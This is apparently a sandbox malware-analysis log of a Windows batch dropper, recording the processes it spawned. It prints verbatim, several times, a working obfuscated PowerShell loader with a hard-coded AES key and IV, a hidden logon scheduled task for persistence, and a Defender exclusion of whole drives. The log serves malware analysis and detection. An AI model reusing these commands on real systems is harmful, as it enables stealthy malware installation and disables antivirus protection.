    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\user\Desktop\UrgenteNotificationRef')
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 28681' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Network28681Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start "" "C:\Users\user\AppData\Roaming\Network28681Man.cmd"
    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Network28681Man.cmd"
    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Network28681Man.cmd';$EErt='EntqgNmryqgNmPoiqgNmnqgNmtqgNm'.Replace('qgNm', ''),'CIZQNreIZQNatIZQNeDIZQNecIZQNryIZQNptIZQNorIZQN'.Replace('IZQN', ''),'FrobfNZmbfNZBasbfNZe6bfNZ4SbfNZtrbfNZinbfNZgbfNZ'.Replace('bfNZ', ''),'SplJahjitJahj'.Replace('Jahj', ''),'TriPkHansiPkHfiPkHoriPkHmFiPkHiiPkHnaiPkHlBliPkHoiPkHciPkHkiPkH'.Replace('iPkH', ''),'GetKBQbCurKBQbrenKBQbtPKBQbrKBQbocKBQbessKBQb'.Replace('KBQb', ''),'RyOcoeyOcoadyOcoLyOcoinyOcoesyOco'.Replace('yOco', ''),'LAguzoAguzadAguz'.Replace('Aguz', ''),'EleDcRNmenDcRNtDcRNAtDcRN'.Replace('DcRN', ''),'MalMOMilMOMnlMOMMolMOMdulMOMllMOMelMOM'.Replace('lMOM', ''),'ChaTLERngTLEReETLERxtTLERenTLERsTLERiTLERonTLER'.Replace('TLER', ''),'DeccotGomcotGpcotGrescotGscotG'.Replace('cotG', ''),'CopobqOyobqOTobqOoobqO'.Replace('obqO', ''),'InvClSOokeClSO'.Replace('ClSO', '');powershell -w hidden;function vTzfR($ukwVU){$hHysF=[System.Security.Cryptography.Aes]::Create();$hHysF.Mode=[System.Security.Cryptography.CipherMode]::CBC;$hHysF.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$hHysF.Key=[System.Convert]::($EErt[2])('zavfxzUUXNH4uECQXv0pvDIOSMJD8RFecmPDqbtRg9g=');$hHysF.IV=[System.Convert]::($EErt[2])('mi6yyZbC4Ex2I6/d7FQcGg==');$ovRQV=$hHysF.($EErt[1])();$BaeOu=$ovRQV.($EErt[4])($ukwVU,0,$ukwVU.Length);$ovRQV.Dispose();$hHysF.Dispose();$BaeOu;}function YlNft($ukwVU){$RVhbp=New-Object System.IO.MemoryStream(,$ukwVU);$YhZKJ=New-Object System.IO.MemoryStream;$XoHSZ=New-Object System.IO.Compression.GZipStream($RVhbp,[IO.Compression.CompressionMode]::($EErt[11]));$XoHSZ.($EErt[12])($YhZKJ);$XoHSZ.Dispose();$RVhbp.Dispose();$YhZKJ.Dispose();$YhZKJ.ToArray();}$JBgWB=[System.IO.File]::($EErt[6])([Console]::Title);$vBlXi=YlNft (vTzfR ([Convert]::($EErt[2])([System.Linq.Enumerable]::($EErt[8])($JBgWB, 5).Substring(2))));$kasXC=YlNft (vTzfR ([Convert]::($EErt[2])([System.Linq.Enumerable]::($EErt[8])($JBgWB, 6).Substring(2))));[System.Reflection.Assembly]::($EErt[7])([byte[]]$kasXC).($EErt[0]).($EErt[13])($null,$null);[System.Reflection.Assembly]::($EErt[7])([byte[]]$vBlXi).($EErt[0]).($EErt[13])($null,$null); "
    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\')
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\user\AppData\Roaming\Network28681Man')
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 28681' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Network28681Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $host.ui.rawui.windowtitle='c:\users\user\desktop\urgentenotificationref.cmd';$eert='entqgnmryqgnmpoiqgnmnqgnmtqgnm'.replace('qgnm', ''),'cizqnreizqnatizqnedizqnecizqnryizqnptizqnorizqn'.replace('izqn', ''),'frobfnzmbfnzbasbfnze6bfnz4sbfnztrbfnzinbfnzgbfnz'.replace('bfnz', ''),'spljahjitjahj'.replace('jahj', ''),'tripkhansipkhfipkhoripkhmfipkhiipkhnaipkhlblipkhoipkhcipkhkipkh'.replace('ipkh', ''),'getkbqbcurkbqbrenkbqbtpkbqbrkbqbockbqbesskbqb'.replace('kbqb', ''),'ryocoeyocoadyocolyocoinyocoesyoco'.replace('yoco', ''),'laguzoaguzadaguz'.replace('aguz', ''),'eledcrnmendcrntdcrnatdcrn'.replace('dcrn', ''),'malmomilmomnlmommolmomdulmomllmomelmom'.replace('lmom', ''),'chatlerngtlereetlerxttlerentlerstleritlerontler'.replace('tler', ''),'deccotgomcotgpcotgrescotgscotg'.replace('cotg', ''),'copobqoyobqotobqooobqo'.replace('obqo', ''),'invclsookeclso'.replace('clso', '');powershell -w hidden;function vtzfr($ukwvu){$hhysf=[system.security.cryptography.aes]::create();$hhysf.mode=[system.security.cryptography.ciphermode]::cbc;$hhysf.padding=[system.security.cryptography.paddingmode]::pkcs7;$hhysf.key=[system.convert]::($eert[2])('zavfxzuuxnh4uecqxv0pvdiosmjd8rfecmpdqbtrg9g=');$hhysf.iv=[system.convert]::($eert[2])('mi6yyzbc4ex2i6/d7fqcgg==');$ovrqv=$hhysf.($eert[1])();$baeou=$ovrqv.($eert[4])($ukwvu,0,$ukwvu.length);$ovrqv.dispose();$hhysf.dispose();$baeou;}function ylnft($ukwvu){$rvhbp=new-object system.io.memorystream(,$ukwvu);$yhzkj=new-object system.io.memorystream;$xohsz=new-object system.io.compression.gzipstream($rvhbp,[io.compression.compressionmode]::($eert[11]));$xohsz.($eert[12])($yhzkj);$xohsz.dispose();$rvhbp.dispose();$yhzkj.dispose();$yhzkj.toarray();}$jbgwb=[system.io.file]::($eert[6])([console]::title);$vblxi=ylnft (vtzfr ([convert]::($eert[2])([system.linq.enumerable]::($eert[8])($jbgwb, 5).substring(2))));$kasxc=ylnft (vtzfr ([convert]::($eert[2])([system.linq.enumerable]::($eert[8])($jbgwb, 6).substring(2))));[system.reflection.assembly]::($eert[7])([byte[]]$kasxc).($eert[0]).($eert[13])($null,$null);[system.reflection.assembly]::($eert[7])([byte[]]$vblxi).($eert[0]).($eert[13])($null,$null); "
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" register-scheduledtask -taskname 'onenote 28681' -trigger (new-scheduledtasktrigger -atlogon) -action (new-scheduledtaskaction -execute 'c:\users\user\appdata\roaming\network28681man.cmd') -settings (new-scheduledtasksettingsset -allowstartifonbatteries -hidden -executiontimelimit 0) -runlevel highest -force
    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $host.ui.rawui.windowtitle='c:\users\user\appdata\roaming\network28681man.cmd';$eert='entqgnmryqgnmpoiqgnmnqgnmtqgnm'.replace('qgnm', ''),'cizqnreizqnatizqnedizqnecizqnryizqnptizqnorizqn'.replace('izqn', ''),'frobfnzmbfnzbasbfnze6bfnz4sbfnztrbfnzinbfnzgbfnz'.replace('bfnz', ''),'spljahjitjahj'.replace('jahj', ''),'tripkhansipkhfipkhoripkhmfipkhiipkhnaipkhlblipkhoipkhcipkhkipkh'.replace('ipkh', ''),'getkbqbcurkbqbrenkbqbtpkbqbrkbqbockbqbesskbqb'.replace('kbqb', ''),'ryocoeyocoadyocolyocoinyocoesyoco'.replace('yoco', ''),'laguzoaguzadaguz'.replace('aguz', ''),'eledcrnmendcrntdcrnatdcrn'.replace('dcrn', ''),'malmomilmomnlmommolmomdulmomllmomelmom'.replace('lmom', ''),'chatlerngtlereetlerxttlerentlerstleritlerontler'.replace('tler', ''),'deccotgomcotgpcotgrescotgscotg'.replace('cotg', ''),'copobqoyobqotobqooobqo'.replace('obqo', ''),'invclsookeclso'.replace('clso', '');powershell -w hidden;function vtzfr($ukwvu){$hhysf=[system.security.cryptography.aes]::create();$hhysf.mode=[system.security.cryptography.ciphermode]::cbc;$hhysf.padding=[system.security.cryptography.paddingmode]::pkcs7;$hhysf.key=[system.convert]::($eert[2])('zavfxzuuxnh4uecqxv0pvdiosmjd8rfecmpdqbtrg9g=');$hhysf.iv=[system.convert]::($eert[2])('mi6yyzbc4ex2i6/d7fqcgg==');$ovrqv=$hhysf.($eert[1])();$baeou=$ovrqv.($eert[4])($ukwvu,0,$ukwvu.length);$ovrqv.dispose();$hhysf.dispose();$baeou;}function ylnft($ukwvu){$rvhbp=new-object system.io.memorystream(,$ukwvu);$yhzkj=new-object system.io.memorystream;$xohsz=new-object system.io.compression.gzipstream($rvhbp,[io.compression.compressionmode]::($eert[11]));$xohsz.($eert[12])($yhzkj);$xohsz.dispose();$rvhbp.dispose();$yhzkj.dispose();$yhzkj.toarray();}$jbgwb=[system.io.file]::($eert[6])([console]::title);$vblxi=ylnft (vtzfr ([convert]::($eert[2])([system.linq.enumerable]::($eert[8])($jbgwb, 5).substring(2))));$kasxc=ylnft (vtzfr ([convert]::($eert[2])([system.linq.enumerable]::($eert[8])($jbgwb, 6).substring(2))));[system.reflection.assembly]::($eert[7])([byte[]]$kasxc).($eert[0]).($eert[13])($null,$null);[system.reflection.assembly]::($eert[7])([byte[]]$vblxi).($eert[0]).($eert[13])($null,$null); "
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" register-scheduledtask -taskname 'onenote 28681' -trigger (new-scheduledtasktrigger -atlogon) -action (new-scheduledtaskaction -execute 'c:\users\user\appdata\roaming\network28681man.cmd') -settings (new-scheduledtasksettingsset -allowstartifonbatteries -hidden -executiontimelimit 0) -runlevel highest -force
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $host.ui.rawui.windowtitle='c:\users\user\desktop\urgentenotificationref.cmd';$eert='entqgnmryqgnmpoiqgnmnqgnmtqgnm'.replace('qgnm', ''),'cizqnreizqnatizqnedizqnecizqnryizqnptizqnorizqn'.replace('izqn', ''),'frobfnzmbfnzbasbfnze6bfnz4sbfnztrbfnzinbfnzgbfnz'.replace('bfnz', ''),'spljahjitjahj'.replace('jahj', ''),'tripkhansipkhfipkhoripkhmfipkhiipkhnaipkhlblipkhoipkhcipkhkipkh'.replace('ipkh', ''),'getkbqbcurkbqbrenkbqbtpkbqbrkbqbockbqbesskbqb'.replace('kbqb', ''),'ryocoeyocoadyocolyocoinyocoesyoco'.replace('yoco', ''),'laguzoaguzadaguz'.replace('aguz', ''),'eledcrnmendcrntdcrnatdcrn'.replace('dcrn', ''),'malmomilmomnlmommolmomdulmomllmomelmom'.replace('lmom', ''),'chatlerngtlereetlerxttlerentlerstleritlerontler'.replace('tler', ''),'deccotgomcotgpcotgrescotgscotg'.replace('cotg', ''),'copobqoyobqotobqooobqo'.replace('obqo', ''),'invclsookeclso'.replace('clso', '');powershell -w hidden;function vtzfr($ukwvu){$hhysf=[system.security.cryptography.aes]::create();$hhysf.mode=[system.security.cryptography.ciphermode]::cbc;$hhysf.padding=[system.security.cryptography.paddingmode]::pkcs7;$hhysf.key=[system.convert]::($eert[2])('zavfxzuuxnh4uecqxv0pvdiosmjd8rfecmpdqbtrg9g=');$hhysf.iv=[system.convert]::($eert[2])('mi6yyzbc4ex2i6/d7fqcgg==');$ovrqv=$hhysf.($eert[1])();$baeou=$ovrqv.($eert[4])($ukwvu,0,$ukwvu.length);$ovrqv.dispose();$hhysf.dispose();$baeou;}function ylnft($ukwvu){$rvhbp=new-object system.io.memorystream(,$ukwvu);$yhzkj=new-object system.io.memorystream;$xohsz=new-object system.io.compression.gzipstream($rvhbp,[io.compression.compressionmode]::($eert[11]));$xohsz.($eert[12])($yhzkj);$xohsz.dispose();$rvhbp.dispose();$yhzkj.dispose();$yhzkj.toarray();}$jbgwb=[system.io.file]::($eert[6])([console]::title);$vblxi=ylnft (vtzfr ([convert]::($eert[2])([system.linq.enumerable]::($eert[8])($jbgwb, 5).substring(2))));$kasxc=ylnft (vtzfr 
([convert]::($eert[2])([system.linq.enumerable]::($eert[8])($jbgwb, 6).substring(2))));[system.reflection.assembly]::($eert[7])([byte[]]$kasxc).($eert[0]).($eert[13])($null,$null);[system.reflection.assembly]::($eert[7])([byte[]]$vblxi).($eert[0]).($eert[13])($null,$null); "Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" register-scheduledtask -taskname 'onenote 28681' -trigger (new-scheduledtasktrigger -atlogon) -action (new-scheduledtaskaction -execute 'c:\users\user\appdata\roaming\network28681man.cmd') -settings (new-scheduledtasksettingsset -allowstartifonbatteries -hidden -executiontimelimit 0) -runlevel highest -forceJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $host.ui.rawui.windowtitle='c:\users\user\appdata\roaming\network28681man.cmd';$eert='entqgnmryqgnmpoiqgnmnqgnmtqgnm'.replace('qgnm', ''),'cizqnreizqnatizqnedizqnecizqnryizqnptizqnorizqn'.replace('izqn', ''),'frobfnzmbfnzbasbfnze6bfnz4sbfnztrbfnzinbfnzgbfnz'.replace('bfnz', ''),'spljahjitjahj'.replace('jahj', ''),'tripkhansipkhfipkhoripkhmfipkhiipkhnaipkhlblipkhoipkhcipkhkipkh'.replace('ipkh', ''),'getkbqbcurkbqbrenkbqbtpkbqbrkbqbockbqbesskbqb'.replace('kbqb', ''),'ryocoeyocoadyocolyocoinyocoesyoco'.replace('yoco', ''),'laguzoaguzadaguz'.replace('aguz', ''),'eledcrnmendcrntdcrnatdcrn'.replace('dcrn', ''),'malmomilmomnlmommolmomdulmomllmomelmom'.replace('lmom', ''),'chatlerngtlereetlerxttlerentlerstleritlerontler'.replace('tler', ''),'deccotgomcotgpcotgrescotgscotg'.replace('cotg', ''),'copobqoyobqotobqooobqo'.replace('obqo', ''),'invclsookeclso'.replace('clso', '');powershell -w hidden;function vtzfr($ukwvu){$hhysf=[system.security.cryptography.aes]::create();$hhysf.mode=[system.security.cryptography.ciphermode]::cbc;$hhysf.padding=[system.security.cryptography.paddingmode]::pkcs7;$hhysf.key=[system.convert]::($eert[2])('zavfxzuuxnh4uecqxv0pvdiosmjd8rfecmpdqbtrg9g=');$hhysf.iv=[system.convert]::($eert[2])('mi6yyzbc4ex2i6/d7fqcgg==');$ovrqv=$hhysf.($eert[1])();$baeou=$ovrqv.($eert[4])($ukwvu,0,$ukwvu.length);$ovrqv.dispose();$hhysf.dispose();$baeou;}function ylnft($ukwvu){$rvhbp=new-object system.io.memorystream(,$ukwvu);$yhzkj=new-object system.io.memorystream;$xohsz=new-object system.io.compression.gzipstream($rvhbp,[io.compression.compressionmode]::($eert[11]));$xohsz.($eert[12])($yhzkj);$xohsz.dispose();$rvhbp.dispose();$yhzkj.dispose();$yhzkj.toarray();}$jbgwb=[system.io.file]::($eert[6])([console]::title);$vblxi=ylnft (vtzfr ([convert]::($eert[2])([system.linq.enumerable]::($eert[8])($jbgwb, 5).substring(2))));$kasxc=ylnft (vtzfr ([convert]::($eert[2])([system.linq.enumerable]::($eert[8])($jbgwb, 6).substring(2))));[system.reflection.assembly]::($eert[7])([byte[]]$kasxc).($eert[0]).($eert[13])($null,$null);[system.reflection.assembly]::($eert[7])([byte[]]$vblxi).($eert[0]).($eert[13])($null,$null); "
    Source: logs.dat.22.dr Binary or memory string: [2024/04/24 14:16:33 Program Manager]
    Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
